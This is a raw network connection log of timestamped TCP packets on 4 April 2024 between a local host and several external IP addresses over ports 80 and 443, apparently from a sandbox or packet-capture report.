Apr 4, 2024 17:49:07.973825932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973870993 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973872900 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.973891973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.973947048 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974030972 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.974035978 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974045038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974051952 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974057913 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974066019 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974088907 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974091053 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.974119902 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.974138021 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.974183083 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974191904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974199057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974227905 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974242926 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974244118 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.974282980 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.974297047 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974317074 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974365950 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.974374056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974412918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974463940 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974481106 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.974502087 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974503994 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.974558115 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974566936 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974590063 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974620104 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.974637032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974658012 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.974689007 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974697113 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974725008 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974735975 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.974780083 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974786997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974792004 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.974801064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974827051 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974836111 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.974848032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974899054 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.974904060 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974912882 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974952936 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.974956989 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.974987984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975039005 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975048065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975059986 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975102901 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975105047 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.975135088 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.975148916 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975167990 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975186110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975224972 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.975243092 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975277901 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975298882 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975341082 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.975368977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975378036 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975385904 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975406885 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975423098 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.975495100 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975512028 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975590944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975599051 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975646019 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975652933 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975662947 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.975703001 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.975708961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975733995 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975742102 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975759029 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975774050 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.975785017 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975800037 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.975825071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975833893 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.975892067 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975899935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975938082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975943089 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.975972891 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.975994110 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.976007938 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.976030111 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.976047993 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.976063013 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.976083994 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.976093054 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.976128101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.976150036 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.976191044 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.976202011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.976234913 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.976291895 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.976335049 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.976341963 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.976355076 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.976367950 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.976373911 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.976387024 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.976413012 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.976424932 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.976435900 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.976445913 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.976475954 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.976517916 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.976528883 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.976536989 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.976540089 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.976568937 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.976582050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.976602077 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:07.976612091 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.976630926 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.976641893 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:07.976660967 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.976690054 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.976691008 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.976727009 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.976741076 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.976741076 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.976746082 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:07.976767063 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.976794958 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:07.982532024 CEST	443	49735	23.47.27.74	192.168.2.10
Apr 4, 2024 17:49:07.982628107 CEST	443	49735	23.47.27.74	192.168.2.10
Apr 4, 2024 17:49:07.982817888 CEST	49735	443	192.168.2.10	23.47.27.74
Apr 4, 2024 17:49:08.048635960 CEST	49735	443	192.168.2.10	23.47.27.74
Apr 4, 2024 17:49:08.048664093 CEST	443	49735	23.47.27.74	192.168.2.10
Apr 4, 2024 17:49:08.162578106 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.162636995 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.162743092 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.162743092 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.162909031 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.162930012 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.162988901 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.163125992 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.163134098 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.163450003 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.346327066 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.346342087 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.346455097 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.346467018 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.346620083 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.346749067 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.346756935 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.346827984 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.346894979 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.350030899 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.352334023 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:08.529721975 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.529771090 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.529980898 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.530112982 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.530143023 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.530173063 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.530215025 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.530288935 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.530359983 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.533266068 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.533400059 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.536370039 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.678618908 CEST	49736	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:08.678664923 CEST	443	49736	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:08.678843975 CEST	49736	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:08.679135084 CEST	49736	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:08.679152012 CEST	443	49736	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:08.713435888 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.713464022 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.713485956 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.713537931 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.713562965 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.713572979 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.713618040 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.713655949 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.713709116 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.713749886 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.713788986 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.713824034 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.719551086 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.719579935 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.719628096 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.719654083 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.719706059 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.719750881 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.896727085 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.896758080 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.896811008 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.896836042 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.896843910 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.896874905 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.896941900 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.896981001 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.897125006 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.897140026 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.897160053 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.897178888 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.902771950 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.902818918 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.902827978 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.902867079 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.903019905 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:08.903055906 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:08.948740959 CEST	49737	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:09.080075026 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.080100060 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.080142975 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.080238104 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.080279112 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.080364943 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.080404997 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.080427885 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.080502987 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.080529928 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.080566883 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.080583096 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.080631018 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.085949898 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.086010933 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.086034060 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.086071014 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.086121082 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.086158991 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.231642962 CEST	80	49737	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:09.231725931 CEST	49737	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:09.231909037 CEST	49737	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:09.231909037 CEST	49737	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:09.264091969 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.264143944 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.264157057 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.264194965 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.264287949 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.264331102 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.264381886 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.264419079 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.264785051 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.264834881 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.264863968 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.264904976 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.264967918 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.265007019 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.265086889 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.265134096 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.270235062 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.270329952 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.270354033 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.270395994 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.270409107 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.270443916 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.447336912 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.447364092 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.447376013 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.447406054 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.447432995 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.447489023 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.447527885 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.447599888 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.447634935 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.447866917 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.447901964 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.447981119 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.448029995 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.448071957 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.448107958 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.448189974 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.448273897 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.453460932 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.453495026 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.453509092 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.453685999 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.453779936 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.453824043 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.511682987 CEST	443	49736	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:09.511785984 CEST	49736	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:09.515284061 CEST	80	49737	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:09.515446901 CEST	49736	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:09.515463114 CEST	443	49736	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:09.515697002 CEST	80	49737	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:09.515734911 CEST	443	49736	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:09.515800953 CEST	49736	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:09.516211033 CEST	49736	443	192.168.2.10	95.216.179.73
Apr 4, 2024 17:49:09.528785944 CEST	80	49737	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:09.529010057 CEST	49737	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:09.529031992 CEST	49737	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:09.532114983 CEST	49738	80	192.168.2.10	193.106.175.76
Apr 4, 2024 17:49:09.564229965 CEST	443	49736	95.216.179.73	192.168.2.10
Apr 4, 2024 17:49:09.631429911 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.631458044 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.631522894 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.631534100 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.631546974 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.631584883 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.631642103 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.631690979 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.631906033 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.631968021 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.632000923 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.632107019 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.632110119 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.632152081 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.632236004 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.632327080 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.632335901 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.632400036 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.632407904 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.632416010 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.632450104 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.632450104 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.637135983 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.637200117 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.637530088 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.637603998 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.638016939 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.638066053 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:09.811847925 CEST	80	49737	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:09.814213991 CEST	80	49738	193.106.175.76	192.168.2.10
Apr 4, 2024 17:49:09.814591885 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.814726114 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:09.814745903 CEST	49738	80	192.168.2.10	193.106.175.76
